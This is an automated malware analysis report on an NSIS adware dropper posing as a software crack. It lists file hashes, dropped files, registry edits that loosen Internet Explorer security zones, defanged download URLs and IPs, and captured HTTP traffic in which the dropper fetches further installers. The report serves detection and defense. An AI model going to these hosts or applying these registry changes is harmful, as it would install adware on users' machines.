Trojan.NSIS.StartPage_9e3487f910

by malwarelabrobot on September 18th, 2015 in Malware Descriptions.

not-a-virus:AdWare.Win32.AdLoad.jumk (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 9e3487f91086d9bb05846dc5cc902d17
SHA1: 4a1b38b6c2581c4c4382f37cc19c3fc3403c5562
SHA256: 5ee44f559729304477c20567dc2791578dbba541d23258ae3eea7c5e0d04d015
SSDeep: 49152:42GmH9ut5iywBn1gqJNA9EkRUELfy6ZXYBUt4MUO5f3d2wS8Cq8c3ab:42HH8iyKCjekfXYB6xZJd2wq ab
Size: 2739836 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: UltraVnc
Created at: 2012-02-24 21:20:04
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

OoRnTsSavW.exe:1620
%original file name%.exe:276
cpSetup.exe:1136

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process OoRnTsSavW.exe:1620 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\752024497 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\cpSetup.exe (4568 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp (0 bytes)

The process %original file name%.exe:276 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\EYogau3uc3 (147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\OoRnTsSavW.exe (11558 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1.tmp (0 bytes)

The process cpSetup.exe:1136 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\00080d09.a (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf6.tmp (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000811bc.a (1690 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp\b61595bf-da45-4e15-927c-f49de52b0e6d.dll (784 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (0 bytes)

Registry activity

The process OoRnTsSavW.exe:1620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 AD BB CF 4D 57 72 14 97 C5 C3 5F 74 1E 12 0F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 6B F2 C2 9E 20 3F 16 8C F5 F0 D8 04 BB D2 A7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process cpSetup.exe:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 D9 A1 5F 0B 0F 8E C4 A0 7D A9 F3 A8 AD 33 82"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Dropped PE files

MD5 File path
3933f341d25c3adcc2a4af2d526f300b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00080d09.a
75afe79cb25593a8b5a3e8237332293f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\000811bc.a
7070aa0e2e0cd288c58a45d14ddbf9b8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf7.tmp\b61595bf-da45-4e15-927c-f49de52b0e6d.dll
7caaf58a526da33c24cbe122e7839693 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\NSISdl.dll
782f8725c3577f209e8204d4e1471d32 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\OoRnTsSavW.exe
bf712f32249029466fa86756f5546950 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\System.dll
7caaf58a526da33c24cbe122e7839693 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy4.tmp\NSISdl.dll
df4bceea67fc36290031d27449198809 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy4.tmp\cpSetup.exe
89d40ecddf3ce6f3b0e6a84f40936912 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy4.tmp\nsArray.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 29324 29696 4.50526 419d4e1be1ac35a5db9c47f553b27cea
.rdata 36864 11118 11264 3.11773 cca1ca3fbf99570f6de9b43ce767f368
.data 49152 469916 512 1.25109 77f0839f8ebea31040e462523e1c770e
.ndata 520192 610304 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 1130496 47400 47616 3.15408 312125ac025ba47ff831384ba4deeaf2
.reloc 1179648 4054 4096 1.26213 ef990ecbd954c165f9157ea47cf201cc

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=4422016&pid=1505&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMwODE1QkFQXQ==&b_typ=pe
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=1505&tid=4422016&b_typ=pe&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMw&reb=1&ic=
hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Power%20iso%206.2%20final%20crack%20%5B230&s1=1505&s2=4422016&setupName=cpSetup&appVersion=2.92&instId=13
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=13&aff_sub=1505&aff_sub2=4422016&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.ic-int-34.xyz/offer.php?affId={aff_id}&trackingId=1542762&instId=13&ho_trackingid={transaction_id}&cc=UA 52.17.177.26
hxxp://up.ic-int-34.xyz/offer.php?affId=1006&trackingId=1542762&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&cc=UA 216.137.61.43
hxxp://up.ic-int-34.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA 216.137.61.43
hxxp://up.ic-int-99.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA 54.88.21.193
hxxp://up.ic-int-34.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 216.137.61.43
hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=13&aff_sub=1505&aff_sub2=4422016&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.ic-int-34.xyz/offer.php?affId={aff_id}&trackingId=1542762&instId=13&ho_trackingid={transaction_id}&cc=UA 52.17.177.26
hxxp://get.int-cp3-234.xyz/launch_reb.php?p=sevenzip&tid=4422016&pid=1505&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMwODE1QkFQXQ==&b_typ=pe 216.137.61.199
hxxp://up.ic-int-34.xyzhxxp://up.ic-int-34.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA 216.137.61.43
hxxp://up.ic-int-34.xyzhxxp://up.ic-int-34.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 216.137.61.43
hxxp://up.int-ic-4.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4422016&b_typ=pe&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMw&reb=1&ic= 216.137.61.233
hxxp://get.ic-dri-76.xyz/?affId=1006&appTitle=Power%20iso%206.2%20final%20crack%20%5B230&s1=1505&s2=4422016&setupName=cpSetup&appVersion=2.92&instId=13 216.137.61.66
hxxp://dl.ic-free.xyz/stub_maker.php?program=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP] 216.137.61.28
hxxp://up.ic-int-34.xyzhxxp://up.ic-int-34.xyz/offer.php?affId=1006&trackingId=1542762&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&cc=UA 216.137.61.43
hxxp://up.ic-int-99.xyzhxxp://up.ic-int-99.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA 54.88.21.193


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake FireFox Version 2.

Traffic

GET hXXp://up.ic-int-34.xyz/offer.php?affId=1006&trackingId=1542762&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&cc=UA HTTP/1.1
Host: up.ic-int-34.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 28712
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Wed, 16 Sep 2015 23:18:24 GMT
X-Cache: Miss from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RFq7p9AzAn96XsJ0Qb55p6zCm-_pdtSz6SvYNs8QTIs3PaZ2BIHMRw==
>n...$.... ......-...Qu........9...i4R#S5.y..[O...<./...y/../s..
w.ol..O('~..Q...wO...%PA..j.....1J.."..[. |.4~.s...G.!.[........i...C.
.8.U........V..A.......D.....Ck.|....j..m.-....|&...B.y..sf.v......G".
.G.........V..#t..<..;..... Lq..v...!j.{.j&.9R.W.taY..........l....
....K..a...X...j.(.).w...kE.k.N...`O... .Gvv..K..9J.?X...\[email protected]_px.
.5.-....=........=#u.V..Arr.E.F;.m....I.^ll'...Nh..."^........{....[..
.8...k..n..{m. $.....\O..|.\...u...r1[.K..^...d... .g.........?.@..!4.
k.dn.A<.=L.s.....y...8..1...]...l~....6..&.]c...&.=......a..sr.....
K[..d.l,.~g3...#V.-..=,...n-..m.`.([email protected]|7x...N..o...P.......J7.
..R...........[.X......A.e..9.n.o|.....((.c...O....Z0.....v.3.N{b.....
95.a...c..`=..mBm.Z.W)..\..,.f..R..r.u..ZZ.U.T......0..N....NhI%m3...V
.$.....R..`.=.1.z. ..ZSM....7..%F....Y.2....]...P...;]...W....Sj?K7[..
.r.\.E..`......r...b...t.2.....'0....B...... ..1ki.#.<."...H.......
.........T].Z..d'.}.....-......k....p....q..U=.o.q 0.8......O..1"...;.
.K|.w....b..^.....t..r..53.NYm...Z../...7.\....~.2.t.":.Q.W.-.~..1.. .
[email protected]<..xY.N.....=0Ud.*)g..?.(.c|..uh.yC. ....
R.b=..5?.{j.r1...(i...0r.k....uy..z.Km`k[.....P....!.E..z..y.....K....
Y..........Z..S..N.LD7.....g.......w... ..L...:.%.K....;.a.E.&..O.T!..
%.t8...c.^.QKb2.~..........;QAu_".p=......0........A....QA%H... w'*..3
.M!.S=....j8.1..^E...n.Q......]..?ouv...yM..d......`B.BW!......Rx.....
...4..c../..3f...<...n.......O;H......F<p9..5t.y;r&P.5.N.}D5..8.
...`q....:..a.k_.U..[.R.......j.Q.m..!..}._.E.p......O..D...O!vD..
<<< skipped >>>


GET /?affId=1006&appTitle=Power%20iso%206.2%20final%20crack%20%5B230&s1=1505&s2=4422016&setupName=cpSetup&appVersion=2.92&instId=13 HTTP/1.0
Host: get.ic-dri-76.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 52213
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Wed, 16 Sep 2015 23:18:22 GMT
X-Cache: Miss from cloudfront
Via: 1.1 13be6f06029966b75af2e6bcb4d1867a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: FEGqC1gw2nrKOWD_X24amgqAYDJZxtpi22d6Qy2D7REKd7wLTloftQ==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
..........,...........................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc....,...........v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>


GET /launch_reb.php?p=sevenzip&tid=4422016&pid=1505&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMwODE1QkFQXQ==&b_typ=pe HTTP/1.0
Host: get.int-cp3-234.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 147
Connection: close
Date: Wed, 16 Sep 2015 23:18:10 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 f7cf1cf41b6eacdcf79cd9a0aa1d0179.cloudfront.net (CloudFront)
X-Amz-Cf-Id: CyqaPuD5_zXOlysnILYT0_wBOokAqd5UwAjtGJY_E8sIszJL1OAWgQ==
s=first..u=hXXp://dl.ic-free.xyz/stub_maker.php?program=sevenzip&tid=4
422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [23081
5BAP]..



GET hXXp://up.ic-int-34.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 HTTP/1.1
Host: up.ic-int-34.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 409128
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Wed, 16 Sep 2015 23:18:24 GMT
X-Cache: Miss from cloudfront
Via: 1.1 9c639fa8cc4e8890b24d42b79b84df74.cloudfront.net (CloudFront)
X-Amz-Cf-Id: IX-JycLt28ASgApPKR5kLt8tcgEfE1tyPMfZqfp7VbYc9Ozdn-aQdg==
..'..*....2.........'*2...:h...........B.....D...K...d..H...S.2,......
J.S.|d..b..k5.....w.gP.......=$e...........v.(KA5P...&~.<.C..<..
_&...#..Y*.... .!.Me.W .....-/)X.;#%..p.K]..........\.&.u..........#k.
.K.`...j.......^.....(6.....)J...]..i......5....4$........ ....GyD...x
..."S.j..r.@... .8......E="..jG..b......$.qA.e*...B^.\#..\.-....iC.9.|
....v..y..>.?.........Q9.}...C..@ .ridh};.."4.?l....D..z....9......
.G&........e7G.n........C>..9m.%...O<,._p....g....W.{...G.4..?.U
.R...i..(...... ......W........1...h.....Z...d.cF.4Sw..'....#[email protected]
...oM..W'.......JNn.KD..l............ihC......u..}.c.R.ab>/.P......
QZ~.....^.V.....qd...b7x.V..... ..#$FL..G..FP..J@.=.&.pL...|...`..X..J
.t.]P...\.........c.7..........l.zN.....X}C.2m_# .g.~...!...e.&.}.....
}.\.=<{=^b.....n.r/...........c@..)`S........?M....j{...>..G....
.{.....P...0eZ...wS...r.......~>.;H....!V.:H.<. nw..aX.m...QN@..
}W.V.ry...,.x!.n ..DV...-........MVx. .NXl._...U.e..j..A.c.(./MU!.<
.u.....v....f......vy..k6.....O>B..t.<#.....k7........*k...jf.0.
...BX.jD.."....U....(4.F%.~z.....x.Uam.\'..vO6`..y&*73=....*9(.V..t...
....[...9..].jp...K.6.z....Z..WY...B.,".<L.-).....S..[........rX..f
.?2.1O!.Q..\...).....9.G.q.?..K... W........T......b.........*.2......
0<6.df.."......|\.r.(..0.F.G.Bb...5..P.0...p.^d{..5ci.p.v.dNd9.%.. 
[email protected]....%....H....`...<.J...L..%..\uc..u{..JG|.....~y
...X..h.'..T...MI.......K.w.....Xn......W.G6...E....=$..G..#..f7.t..m%
..nS=G(iBW.t.w.>....Y...<..8.l.....T..*..7.....T..c.D..C\...
<<< skipped >>>


GET /stub_maker.php?program=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP] HTTP/1.0
Host: dl.ic-free.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 75780
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="55f9f8a7af72c.exe"
X-Powered-By: ASP.NET
Date: Wed, 16 Sep 2015 23:17:59 GMT
X-Cache: Miss from cloudfront
Via: 1.1 e24fef4a7b03bd84e1e8d57f2471a84d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GG6UfCTsiA_ogJ4-QKKwvXAple38bBiiFvPyY_mokKkkXnNXfpZYVA==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......aKZe%*46%*46
%*46,R.6&*46,R.64*46%*56.*46>..6 *46>..6$*46>..6$*46Rich%*46.
.......PE..L.....GO.................p....>..B...8............@.....
......................O...........@.................................4.
........N.......................?.H...................................
.................................................text....o.......p....
.............. ..`.rdata..b*.......,...t..............@[email protected]&g
t;[email protected]....... ?........................
..rsrc.........N.....................@[email protected]...........
[email protected]...........................................................
......................................................................
......................................................................
......................................................................
...........................................................U....\.}..t
 .}[email protected][email protected]..
.E..E.P.u.....@..}[email protected]... M..........M........E
...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@
[email protected]}[email protected].}.j.W.E
[email protected][email protected][email protected] [email protected]
...u....E.P.u.....@._^3.[.....L$........i. @...T.....tUVW.q.3.;5....sD
..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5....r
<<< skipped >>>


GET /launch_v5.php?p=sevenzip&pid=1505&tid=4422016&b_typ=pe&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMw&reb=1&ic= HTTP/1.0
Host: up.int-ic-4.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 1694
Connection: close
Date: Wed, 16 Sep 2015 23:18:12 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: BmgjpRaBJJ72FLrvQMsGXr98cAgZ9LGn2xPeFvdYpbjaQ9fT3-pSpg==
files=1.t1=dl.u1=hXXp://get.ic-dri-76.xyz/?affId=1006&appTitle=Power%2
520iso%206.2%20final%20crack%20%5B230&s1=1505&s2=4422016&set
upName=cpSetup&appVersion=2.92&instId=13.n1=cpSetup.exe.b1=cp.c1=seven
zip-1.s1=0.t2=dl.u2=hXXp://do.dabado-34.xyz/stub_maker_ua.php?url=http
://get.file136desktop.info/DownloadManager/Get?p=638&d
=544&l=461&n=1&productname=sevenzip&d1=4422016&d2%
3D1505&dynamicname=Power%20iso%206.2%20final%20crack%20%
255B230.n2=setup-1228.exe.b2=ru.c2=sevenzip-2.s2=0.t3=dl.u3=hXXp://www
.amonisto.org/download.php?version=1.1.5.26&campid=2140&instid[appname
]=&instid[appsetupurl]=http://pe-sixi.com/downloadS.php?bu%3
Dam&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com%
2Fimg/icon_installer.png&prefix=Setup&instid[thankyoupage]=.n3=Setup
__2140_il228.exe.b3=am.c3=2140-sevenzip.s3=0.t4=dl.u4=hXXp://stapi.swe
etcomet.com/api/stamp/setup.exe?&affiliateid=1780&productname=Power%
20iso%206.2%20final%20crack%20%5B230&producturl=http:/%2
Fd3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=ht
tp://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productve
rsion=9.20&producteula=http://sevenzip.info/terms.html&product
size=1.06MB&productcmd=s&publishercontact=http://sevenzip.inf
o&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&ant
ivirusPolicy=2&subid=1505&subid2=4422016.n4=SevenZip-apset.exe.b4=ap.c
4=sevenzip.s4=0.t5=dl.u5=hXXp://sub.spirlymo.com/installers/cli/14
<<< skipped >>>


POST hXXp://up.ic-int-99.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA HTTP/1.1
Host: up.ic-int-99.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded

id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57
HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 16 Sep 2015 23:18:24 GMT
Connection: close
Content-Length: 344
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org
/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length
 Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="t
ext/html; charset=us-ascii"></HEAD>..<BODY><h2>Le
ngth Required</h2>..<hr><p>HTTP Error 411. The reque
st must be chunked or have a content length.</p>..</BODY>&
lt;/HTML>....



GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=13&aff_sub=1505&aff_sub2=4422016&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.ic-int-34.xyz/offer.php?affId={aff_id}&trackingId=1542762&instId=13&ho_trackingid={transaction_id}&cc=UA HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
